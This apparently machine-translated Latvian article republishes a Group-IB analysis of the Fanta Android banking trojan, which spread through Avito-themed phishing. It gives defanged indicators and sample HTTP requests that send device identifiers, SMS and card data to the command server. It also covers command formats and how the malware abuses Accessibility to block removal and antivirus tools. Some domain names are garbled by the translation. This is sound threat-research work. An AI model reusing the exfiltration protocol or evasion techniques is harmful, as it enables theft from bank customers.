🥇Leisya, Fanta: jauna vecā Android Trojas zirga taktika

Kādu dienu vēlaties kaut ko pārdot vietnē Avito un, ievietojot detalizētu sava produkta aprakstu (piemēram, RAM moduli), saņemsit šādu ziņojumu:

Atverot saiti, jūs redzēsit šķietami nekaitīgu lapu, kas informē jūs, laimīgo un veiksmīgo pārdevēju, ka pirkums ir veikts:

Kad noklikšķināsit uz pogas Turpināt, jūsu Android ierīcē tiks lejupielādēts APK fails ar ikonu un uzticamību iedvesmojošu nosaukumu. Jūs instalējāt aplikāciju, kas nez kāpēc pieprasīja AccessibilityService tiesības, tad parādījās pāris logi un ātri pazuda un... Viss.

Jūs dodaties, lai pārbaudītu savu bilanci, bet kāda iemesla dēļ jūsu bankas lietotne atkal pieprasa jūsu kartes informāciju. Pēc datu ievadīšanas notiek kaut kas šausmīgs: kāda jums joprojām neskaidra iemesla dēļ no jūsu konta sāk pazust nauda. Jūs mēģināt atrisināt problēmu, bet tālrunis pretojas: tas nospiež taustiņus “Atpakaļ” un “Sākums”, neizslēdzas un neļauj aktivizēt nekādus drošības pasākumus. Rezultātā tu paliec bez naudas, tavas preces nav iegādātas, esi apmulsis un brīnies: kas noticis?

Atbilde ir vienkārša: jūs esat kļuvis par Android Trojas zirga Fanta upuri, kas ir Flexnet ģimenes loceklis. Kā tas notika? Paskaidrosim tagad.

Autori: Andrejs Polovinkins, jaunākais speciālists ļaunprātīgas programmatūras analīzē, Ivans Pisarevs, ļaunprātīgas programmatūras analīzes speciālists.

Daži statistikas dati

Android Trojas zirgu Flexnet saime pirmo reizi kļuva zināma 2015. gadā. Diezgan ilga darbības laikā ģimene paplašinājās līdz vairākām pasugām: Fanta, Limebot, Lipton utt. Trojas zirgs, kā arī ar to saistītā infrastruktūra nestāv uz vietas: tiek izstrādātas jaunas efektīvas izplatīšanas shēmas - mūsu gadījumā augstas kvalitātes pikšķerēšanas lapas, kas paredzētas konkrētam lietotājam-pārdevējam, un Trojas zirgu izstrādātāji seko modes tendencēm vīrusu rakstīšana - jaunas funkcionalitātes pievienošana, kas ļauj efektīvāk zagt naudu no inficētām ierīcēm un apiet aizsardzības mehānismus.

Šajā rakstā aprakstītā kampaņa ir paredzēta lietotājiem no Krievijas, neliels skaits inficēto ierīču reģistrēts Ukrainā, bet vēl mazāks skaits – Kazahstānā un Baltkrievijā.

Lai gan Flexnet ir Android Trojas arēnā jau vairāk nekā 4 gadus un to ir detalizēti pētījuši daudzi pētnieki, tas joprojām ir labā formā. Sākot ar 2019. gada janvāri, iespējamais zaudējumu apjoms ir vairāk nekā 35 miljoni rubļu – un tas attiecas tikai uz kampaņām Krievijā. 2015. gadā pagrīdes forumos tika pārdotas dažādas šī Android Trojas zirga versijas, kur varēja atrast arī Trojas zirga pirmkodu ar detalizētu aprakstu. Tas nozīmē, ka postījumu statistika pasaulē ir vēl iespaidīgāka. Nav slikts rādītājs tādam vecim, vai ne?

No pārdošanas līdz maldināšanai

Kā redzams no iepriekš uzrādītā pikšķerēšanas lapas ekrānuzņēmuma interneta pakalpojumam Avito sludinājumu ievietošanai, tas bija sagatavots konkrētam upurim. Acīmredzot uzbrucēji izmanto vienu no Avito parsētājiem, kas izvelk pārdevēja tālruņa numuru un vārdu, kā arī preces aprakstu. Pēc lapas paplašināšanas un APK faila sagatavošanas cietušajam tiek nosūtīta SMS ar viņa vārdu un saiti uz pikšķerēšanas lapu, kurā ir viņa preces apraksts un summa, kas saņemta no preces “pārdošanas”. Noklikšķinot uz pogas, lietotājs saņem ļaunprātīgu APK failu - Fanta.

Domēna shcet491[.]ru izpēte parādīja, ka tas ir deleģēts Hostinger DNS serveriem:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

Domēna zonas failā ir ieraksti, kas norāda uz IP adresēm 31.220.23[.]236, 31.220.23[.]243 un 31.220.23[.]235. Tomēr domēna primārā resursa ieraksts (A ieraksts) norāda uz serveri ar IP adresi 178.132.1[.]240.

IP adrese 178.132.1[.]240 atrodas Nīderlandē un pieder mitinātājam WorldStream. IP adreses 31.220.23[.]235, 31.220.23[.]236 un 31.220.23[.]243 atrodas Apvienotajā Karalistē un pieder dalītā mitināšanas serverim HOSTINGER. Lietots kā ierakstītājs openprov-ru. Uz IP adreses 178.132.1[.]240 tika atdalīti arī šādi domēni:

sdelka-ru[.]ru
tovar-av[.]ru
av-tovar[.]ru
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

Jāatzīmē, ka saites šādā formātā bija pieejamas gandrīz visos domēnos:

http://(www.){0,1}<%domain%>/[0-9]{7}

Šajā veidnē ir iekļauta arī saite no īsziņas. Pamatojoties uz vēsturiskajiem datiem, tika konstatēts, ka viens domēns atbilst vairākām saitēm iepriekš aprakstītajā shēmā, kas norāda, ka viens domēns tika izmantots Trojas zirga izplatīšanai vairākiem upuriem.

Palēksim nedaudz uz priekšu: Trojas zirgs, kas lejupielādēts, izmantojot saiti no SMS, izmanto adresi kā vadības serveri onusedseddohap[.]klubs. Šis domēns tika reģistrēts 2019-03-12, un, sākot ar 2019-04-29, APK lietojumprogrammas mijiedarbojās ar šo domēnu. Pamatojoties uz datiem, kas iegūti no VirusTotal, kopā ar šo serveri mijiedarbojās 109 lietojumprogrammas. Pats domēns tika atrisināts līdz IP adresei 217.23.14[.]27, kas atrodas Nīderlandē un pieder saimniekam WorldStream. Lietots kā ierakstītājs vārda lēta. Uz šo IP adresi tika atrisināti arī domēni bad-racoon[.]klubs (sākot no 2018-09-25) un bad-racoon[.]tiešraidē (sākot no 2018-10-25). Ar domēnu bad-racoon[.]klubs ar vairāk nekā 80 APK failiem bad-racoon[.]tiešraidē - vairāk nekā 100.

Kopumā uzbrukums attīstās šādi:

Kas ir zem Fantas vāka?

Tāpat kā daudzi citi Android Trojas zirgi, Fanta spēj lasīt un sūtīt īsziņas, veikt USSD pieprasījumus un parādīt savus logus virs lietojumprogrammām (tostarp banku programmām). Tomēr šīs ģimenes funkcionalitātes arsenāls ir pienācis: Fanta sāka lietot Pieejamības pakalpojums dažādiem mērķiem: citu lietojumprogrammu paziņojumu satura lasīšanai, Trojas zirga atklāšanas un darbības apturēšanas novēršanai inficētā ierīcē utt. Fanta darbojas visās Android versijās, kas nav jaunākas par 4.4. Šajā rakstā mēs sīkāk aplūkosim šādu Fanta paraugu:

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Uzreiz pēc palaišanas

Tūlīt pēc palaišanas Trojas zirgs paslēpj savu ikonu. Lietojumprogramma var darboties tikai tad, ja inficētās ierīces nosaukums nav sarakstā:

android_x86
VirtualBox
Nexus 5X (bults)
Nexus 5 (žilete)

Šī pārbaude tiek veikta Trojas zirga galvenajā pakalpojumā - GalvenaisService. Palaižot pirmo reizi, lietojumprogrammas konfigurācijas parametri tiek inicializēti uz noklusējuma vērtībām (konfigurācijas datu glabāšanas formāts un to nozīme tiks apspriesta vēlāk), un vadības serverī tiek reģistrēta jauna inficēta ierīce. Serverim tiks nosūtīts HTTP POST pieprasījums ar ziņojuma veidu register_bot un informācija par inficēto ierīci (Android versija, IMEI, tālruņa numurs, operatora nosaukums un valsts kods, kurā operators ir reģistrēts). Adrese kalpo kā vadības serveris hXXp://onuseseddohap[.]club/controller.php. Atbildot uz to, serveris nosūta ziņojumu ar laukiem bot_id, bot_pwd, serveris — lietojumprogramma saglabā šīs vērtības kā CnC servera parametrus. Parametrs serveris neobligāti, ja lauks nav saņemts: Fanta izmanto reģistrācijas adresi - hXXp://onuseseddohap[.]club/controller.php. CnC adreses maiņas funkciju var izmantot, lai atrisinātu divas problēmas: vienmērīgi sadalīt slodzi starp vairākiem serveriem (ja ir liels inficēto ierīču skaits, neoptimizēta tīmekļa servera slodze var būt augsta), kā arī izmantot alternatīvs serveris kāda no CnC serveriem atteices gadījumā.

Ja pieprasījuma nosūtīšanas laikā rodas kļūda, Trojas zirgs atkārtos reģistrācijas procesu pēc 20 sekundēm.

Kad ierīce ir veiksmīgi reģistrēta, Fanta lietotājam parādīs šādu ziņojumu:

Svarīga piezīme: dienests zvanīja Sistēmas drošība — Trojas pakalpojuma nosaukums un pēc noklikšķināšanas uz pogas ОК Tiks atvērts logs ar inficētās ierīces pieejamības iestatījumiem, kurā lietotājam ir jāpiešķir piekļuves tiesības ļaunprātīgajam pakalpojumam:

Tiklīdz lietotājs ieslēdzas Pieejamības pakalpojums, Fanta iegūst piekļuvi lietojumprogrammu logu saturam un tajos veiktajām darbībām:

Tūlīt pēc pieejamības tiesību saņemšanas Trojas zirgs pieprasa administratora tiesības un tiesības lasīt paziņojumus:

Izmantojot AccessibilityService, lietojumprogramma simulē taustiņsitienus, tādējādi piešķirot sev visas nepieciešamās tiesības.

Fanta izveido vairākus datu bāzes gadījumus (kas tiks aprakstīti vēlāk), kas nepieciešami, lai saglabātu konfigurācijas datus, kā arī procesā savākto informāciju par inficēto ierīci. Lai nosūtītu savākto informāciju, Trojas zirgs izveido atkārtotu uzdevumu, kas paredzēts, lai lejupielādētu laukus no datu bāzes un saņemtu komandu no vadības servera. Intervāls piekļuvei CnC tiek iestatīts atkarībā no Android versijas: 5.1 gadījumā intervāls būs 10 sekundes, pretējā gadījumā 60 sekundes.

Lai saņemtu komandu, Fanta izdara pieprasījumu GetTask uz pārvaldības serveri. Atbildot uz to, CnC var nosūtīt vienu no šīm komandām:

Komanda	Apraksts
0	Sūtīt SMS ziņu
1	Veiciet tālruņa zvanu vai USSD komandu
2	Atjaunina parametru intervāls
3	Atjaunina parametru krustošanās
6	Atjaunina parametru sms Manager
9	Sāciet īsziņu apkopošanu
11	Atiestatiet tālruni uz rūpnīcas iestatījumiem
12	Iespējot/atspējot dialoglodziņa izveides reģistrēšanu

Fanta arī apkopo paziņojumus no 70 banku lietotnēm, ātro maksājumu sistēmām un e-makiem un glabā tos datu bāzē.

Konfigurācijas parametru saglabāšana

Lai saglabātu konfigurācijas parametrus, Fanta izmanto standarta pieeju Android platformai - preferences- faili. Iestatījumi tiks saglabāti failā ar nosaukumu iestatījumi. Saglabāto parametru apraksts ir zemāk esošajā tabulā.

Vārds	Noklusējuma vērtība	Iespējamās vērtības	Apraksts
id	0	Vesels skaitlis	Bota ID
serveris	hXXp://onuseseddohap[.]club/	URL	Kontrolējiet servera adresi
pwd	Sākot no	Rinda	Servera parole
intervāls	20	Vesels skaitlis	Laika intervāls. Norāda, uz cik ilgu laiku jāatliek šādi uzdevumi: Nosūtot pieprasījumu par nosūtītās SMS ziņas statusu Jaunas komandas saņemšana no pārvaldības servera
krustošanās	visi	visi/telNumber	Ja lauks ir vienāds ar virkni visi vai telNumber, tad saņemtā SMS ziņa tiks pārtverta lietojumprogrammā un netiks rādīta lietotājam
sms Manager	0	0/1	Iespējot/atspējot lietojumprogrammu kā noklusējuma SMS adresātu
lasīt dialoglodziņu	nepatiess	Patiess/nepatiess	Iespējot/atspējot notikumu reģistrēšanu Pieejamības pasākums

Fanta arī izmanto failu sms Manager:

Vārds	Noklusējuma vērtība	Iespējamās vērtības	Apraksts
pckg	Sākot no	Rinda	Izmantotā īsziņu pārvaldnieka nosaukums

Mijiedarbība ar datu bāzēm

Savas darbības laikā Trojas zirgs izmanto divas datu bāzes. Datu bāze nosaukta a izmanto, lai saglabātu dažādu informāciju, kas savākta no tālruņa. Otrā datu bāze ir nosaukta fanta.db un tiek izmantots, lai saglabātu iestatījumus, kas ir atbildīgi par pikšķerēšanas logu izveidi, kas paredzēti informācijas apkopošanai par bankas kartēm.

Trojas zirgs izmanto datu bāzi а lai saglabātu savākto informāciju un reģistrētu savas darbības. Dati tiek glabāti tabulā žurnāli. Lai izveidotu tabulu, izmantojiet šādu SQL vaicājumu:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Datu bāzē ir šāda informācija:

1. Inficētās ierīces palaišanas reģistrēšana ar ziņojumu Telefons ieslēdzās!

2. Paziņojumi no lietojumprogrammām. Ziņojums tiek ģenerēts saskaņā ar šādu veidni:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bankas karšu dati no Trojas zirga izveidotajām pikšķerēšanas formām. Parametrs VIEW_NAME var būt viens no šiem:

AliExpress
Avito
Google Play
Dažādi <%App Name%>

Ziņojums tiek reģistrēts šādā formātā:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Ienākošās/izejošās SMS ziņas šādā formātā:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informācija par pakotni, kas izveido dialoglodziņu šādā formātā:

(<%Package name%>)<%Package information%>

Tabulas piemērs žurnāli:

Viena no Fantas funkcionalitātēm ir informācijas vākšana par bankas kartēm. Datu apkopošana notiek, izveidojot pikšķerēšanas logus, atverot bankas lietojumprogrammas. Trojas zirgs pikšķerēšanas logu izveido tikai vienu reizi. Informācija, ka logs tika parādīts lietotājam, tiek saglabāta tabulā iestatījumi datu bāzē fanta.db. Lai izveidotu datu bāzi, izmantojiet šādu SQL vaicājumu:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Visi tabulas lauki iestatījumi pēc noklusējuma inicializēts uz 1 (izveidojiet pikšķerēšanas logu). Pēc tam, kad lietotājs ievadīs savus datus, vērtība tiks iestatīta uz 0. Tabulas lauku piemērs iestatījumi:

can_login — lauks ir atbildīgs par veidlapas attēlošanu, atverot bankas pieteikumu
pirmā_banka - nav izmantots
can_avito — lauks ir atbildīgs par veidlapas parādīšanu, atverot Avito lietojumprogrammu
can_ali — lauks ir atbildīgs par veidlapas parādīšanu, atverot lietojumprogrammu Aliexpress
var_cits — lauks ir atbildīgs par veidlapas parādīšanu, atverot jebkuru pieteikumu no saraksta: Yula, Pandao, Drom Auto, Wallet. Atlaižu un bonusu kartes, Aviasales, Rezervēšana, Trivago
can_card — lauks ir atbildīgs par veidlapas parādīšanu atverot Google Play

Mijiedarbība ar pārvaldības serveri

Tīkla mijiedarbība ar pārvaldības serveri notiek, izmantojot HTTP protokolu. Lai strādātu ar tīklu, Fanta izmanto populāro Retrofit bibliotēku. Pieprasījumi tiek sūtīti uz: hXXp://onuseseddohap[.]club/controller.php. Servera adresi var mainīt, reģistrējoties serverī. Sīkfaili var tikt nosūtīti kā atbilde no servera. Fanta serverim veic šādus pieprasījumus:

Bota reģistrācija vadības serverī notiek vienreiz, pēc pirmās palaišanas. Uz serveri tiek nosūtīti šādi dati par inficēto ierīci:
· Cepums — no servera saņemtie sīkfaili (noklusējuma vērtība ir tukša virkne)
· mode — virknes konstante register_bot
· priedēklis — veselu skaitļu konstante 2
· version_sdk — tiek veidots pēc šādas veidnes: <%Build.MODEL%>/<%Build.VERSION.RELEASE%> (Avit)
· imei — inficētās ierīces IMEI
· valsts — tās valsts kods, kurā operators reģistrēts, ISO formātā
· skaits - telefona numurs
· operators — operatora nosaukums

Serverim nosūtīta pieprasījuma piemērs:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
Atbildot uz pieprasījumu, serverim ir jāatgriež JSON objekts, kurā ir šādi parametri:
· bot_id — inficētās ierīces ID. Ja bot_id ir vienāds ar 0, Fanta atkārtoti izpildīs pieprasījumu.
bot_pwd — servera parole.
serveris — kontrolēt servera adresi. Izvēles parametrs. Ja parametrs nav norādīts, tiks izmantota lietojumprogrammā saglabātā adrese.

JSON objekta piemērs:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

Pieprasījums saņemt komandu no servera. Uz serveri tiek nosūtīti šādi dati:
· Cepums — no servera saņemtās sīkdatnes
· pieteikums — inficētās ierīces ID, kas tika saņemts, nosūtot pieprasījumu register_bot
· pwd — servera parole
· divice_admin — lauks nosaka, vai ir iegūtas administratora tiesības. Ja ir iegūtas administratora tiesības, lauks ir vienāds ar 1citādi 0
· Pieejamība — Pieejamības pakalpojuma darbības statuss. Ja pakalpojums tika palaists, vērtība ir 1citādi 0
· SMS pārvaldnieks — parāda, vai Trojas zirgs ir iespējots kā noklusējuma lietojumprogramma SMS saņemšanai
· ekrāns — parāda, kādā stāvoklī atrodas ekrāns. Tiks iestatīta vērtība 1, ja ekrāns ir ieslēgts, pretējā gadījumā 0;

Serverim nosūtīta pieprasījuma piemērs:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
Atkarībā no komandas serveris var atgriezt JSON objektu ar dažādiem parametriem:

· Komanda Sūtīt SMS ziņu: parametri satur tālruņa numuru, SMS ziņas tekstu un sūtāmās ziņas ID. Identifikators tiek izmantots, sūtot ziņojumu serverim ar veidu setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· Komanda Veiciet tālruņa zvanu vai USSD komandu: tālruņa numurs vai komanda tiek parādīta atbildes pamattekstā.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· Komanda Mainīt intervāla parametru.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· Komanda Mainīt pārtveršanas parametru.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· Komanda Mainiet lauku SmsManager.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· Komanda Savāc SMS ziņas no inficētas ierīces.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· Komanda Atiestatiet tālruni uz rūpnīcas iestatījumiem:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· Komanda Mainiet ReadDialog parametru.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

Ziņas sūtīšana ar veidu setSmsStatus. Šis pieprasījums tiek veikts pēc komandas izpildes Sūtīt SMS ziņu. Pieprasījums izskatās šādi:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

Datu bāzes satura augšupielāde. Katram pieprasījumam tiek pārsūtīta viena rinda. Uz serveri tiek nosūtīti šādi dati:
· Cepums — no servera saņemtās sīkdatnes
· mode — virknes konstante setSaveInboxSms
· pieteikums — inficētās ierīces ID, kas tika saņemts, nosūtot pieprasījumu register_bot
· teksts — teksts pašreizējā datu bāzes ierakstā (lauks d no galda žurnāli datu bāzē а)
· skaits — pašreizējā datu bāzes ieraksta nosaukums (lauks p no galda žurnāli datu bāzē а)
· sms_mode — vesela skaitļa vērtība (lauks m no galda žurnāli datu bāzē а)

Pieprasījums izskatās šādi:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
Ja tā ir veiksmīgi nosūtīta uz serveri, rinda tiks dzēsta no tabulas. Servera atgrieztā JSON objekta piemērs:
```
{
    "response":[],
    "status":"ok"
}
```

Mijiedarbība ar AccessibilityService

AccessibilityService tika ieviests, lai padarītu Android ierīces vieglāk lietojamas cilvēkiem ar invaliditāti. Vairumā gadījumu, lai mijiedarbotos ar lietojumprogrammu, ir nepieciešama fiziska mijiedarbība. AccessibilityService ļauj tos veikt programmatiski. Fanta izmanto pakalpojumu, lai izveidotu viltus logus banku lietojumprogrammās un neļautu lietotājiem atvērt sistēmas iestatījumus un dažas lietojumprogrammas.

Izmantojot AccessibilityService funkcionalitāti, Trojas zirgs uzrauga inficētās ierīces ekrāna elementu izmaiņas. Kā aprakstīts iepriekš, Fanta iestatījumos ir parametrs, kas ir atbildīgs par reģistrēšanas darbībām ar dialoglodziņiem - lasīt dialoglodziņu. Ja šis parametrs ir iestatīts, datu bāzei tiks pievienota informācija par pakotnes nosaukumu un aprakstu, kas izraisīja notikumu. Trojas zirgs veic šādas darbības, kad tiek aktivizēti notikumi:

Imitē atpakaļ un sākuma taustiņu nospiešanu šādos gadījumos:
· ja lietotājs vēlas pārstartēt savu ierīci
· ja lietotājs vēlas dzēst lietojumprogrammu “Avito” vai mainīt piekļuves tiesības
· ja lapā ir pieminēta lietojumprogramma “Avito”.
· atverot lietojumprogrammu Google Play Protect
· atverot lapas ar AccessibilityService iestatījumiem
· kad tiek parādīts dialoglodziņš Sistēmas drošība
· atverot lapu ar iestatījumiem “Zīmēt pār citu lietotni”.
· atverot lapu “Lietojumprogrammas”, “Atkopšana un atiestatīšana”, “Datu atiestatīšana”, “Atiestatīt iestatījumus”, “Izstrādātāja panelis”, “Īpašais. iespējas”, “Īpašas iespējas”, “Īpašas tiesības”
· ja notikumu ģenerēja noteiktas lietojumprogrammas.

Lietojumprogrammu saraksts
- android
- Master Lite
- Clean Master
- Clean Master x86 CPU
- Meizu lietojumprogrammu atļauju pārvaldība
- MIUI drošība
- Clean Master — pretvīrusu un kešatmiņas un atkritumu tīrītājs
- Vecāku kontrole un GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock un tīmekļa drošības beta versija
- Vīrusu tīrītājs, pretvīrusu līdzeklis, tīrītājs (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivīruss un bezmaksas aizsardzība 2019
- Mobilā drošība MegaFon
- AVG aizsardzība Xperia
- Mobilā drošība
- Malwarebytes antivīruss un aizsardzība
- Antivīruss operētājsistēmai Android 2019
- Drošības meistars - antivīruss, VPN, AppLock, pastiprinātājs
- AVG antivīruss Huawei planšetdatora sistēmas pārvaldniekam
- Samsung pieejamība
- Samsung Smart Manager
- Drošības meistars
- Ātruma pastiprinātājs
- Dr.Web
- Dr.Web drošības telpa
- Dr.Web mobilais vadības centrs
- Dr.Web Security Space Life
- Dr.Web mobilais vadības centrs
- Antivīrusu un mobilā drošība
- Kaspersky Internet Security: Antivīruss un aizsardzība
- Kaspersky akumulatora darbības laiks: taupītājs un pastiprinātājs
- Kaspersky Endpoint Security — aizsardzība un pārvaldība
- AVG Antivirus free 2019 - Android aizsardzība
- android antivīruss
- Norton Mobile Security un Antivirus
- Antivīruss, ugunsmūris, VPN, mobilā drošība
- Mobilā drošība: antivīruss, VPN, aizsardzība pret zādzībām
- Antivīruss operētājsistēmai Android
Ja atļauja tiek pieprasīta, sūtot SMS īsziņu uz īso numuru, Fanta simulē noklikšķināšanu uz izvēles rūtiņas Atcerieties izvēli un pogu sūtīt.
Mēģinot atņemt Trojas zirgam administratora tiesības, tas bloķē tālruņa ekrānu.
Neļauj pievienot jaunus administratorus.
Ja pretvīrusu lietojumprogramma dr.web atklāja draudus, Fanta atdarina pogas nospiešanu ignorēt.
Trojas zirgs simulē pogas Atpakaļ un Sākums nospiešanu, ja notikumu ģenerēja lietojumprogramma Samsung ierīču kopšana.
Fanta izveido pikšķerēšanas logus ar veidlapām informācijas ievadīšanai par bankas kartēm, ja tika palaista aplikācija no aptuveni 30 dažādu interneta pakalpojumu saraksta. Starp tiem: AliExpress, Booking, Avito, Google Play tirgus komponents, Pandao, Drom Auto utt.

Pikšķerēšanas veidlapas

Fanta analizē, kuras lietojumprogrammas darbojas inficētajā ierīcē. Ja tika atvērta interesējošā lietojumprogramma, Trojas zirgs virs visiem citiem parāda pikšķerēšanas logu, kas ir veidlapa bankas kartes informācijas ievadīšanai. Lietotājam jāievada šādi dati:
- Kartes numurs
- Kartes derīguma termiņš
- CVV
- Kartes īpašnieka vārds (ne visām bankām)
Atkarībā no darbojošās lietojumprogrammas tiks parādīti dažādi pikšķerēšanas logi. Tālāk ir sniegti dažu no tiem piemēri:

AliExpress:

Avito:

Dažiem citiem lietojumiem, piemēram, Google Play tirgus, Aviasales, Pandao, rezervēšana, Trivago:

Kā tas īsti bija

Par laimi, persona, kas saņēma raksta sākumā aprakstīto SMS īsziņu, izrādījās kiberdrošības speciālists. Tāpēc īstā, nerežisora versija atšķiras no iepriekš stāstītās: cilvēks saņēma interesantu SMS, pēc kuras viņš to nodeva Grupas-IB draudu medību izlūkošanas komandai. Uzbrukuma rezultāts ir šis raksts. Laimīgas beigas, vai ne? Tomēr ne visi stāsti beidzas tik veiksmīgi, un, lai jūsējais neizskatītos pēc režisora griezuma ar naudas zaudējumiem, vairumā gadījumu pietiek ar šādu sen aprakstīto noteikumu ievērošanu:
- neinstalējiet lietojumprogrammas mobilajām ierīcēm ar Android OS no citiem avotiem, izņemot Google Play
- Instalējot lietojumprogrammu, pievērsiet īpašu uzmanību lietojumprogrammas pieprasītajām tiesībām
- pievērsiet uzmanību lejupielādēto failu paplašinājumiem
- regulāri instalējiet Android OS atjauninājumus
- neapmeklējiet aizdomīgos resursus un nelejupielādējiet no turienes failus
- Neklikšķiniet uz saitēm, kas saņemtas īsziņās.

Avots: www.habr.com

Leysya, Fanta: jauna taktika vecam Android Trojas zirgam